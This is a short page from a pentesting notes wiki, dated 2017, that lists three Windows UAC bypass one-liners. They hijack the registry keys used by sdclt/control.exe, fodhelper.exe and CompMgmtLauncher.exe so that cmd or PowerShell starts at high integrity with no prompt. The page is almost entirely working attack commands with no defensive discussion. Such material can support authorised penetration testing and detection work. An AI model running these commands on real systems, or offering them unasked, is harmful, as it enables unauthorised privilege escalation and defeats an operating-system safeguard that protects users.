UAC Bypass

From BHaFSec Pentesting Notes Wiki
Revision as of 13:22, 2 October 2017 by Illwill (talk | contribs) (Created page with "UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting == UAC bypass for Win10 - control.exe == reg add "HKEY_CURRENT_USER\Software\Micro...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search

UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting


UAC bypass for Win10 - control.exe

 reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f


UAC bypass for Win10 - fodhelper.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f


UAC bypass for 7/8/10 - CompMgmtLauncher.exe

reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f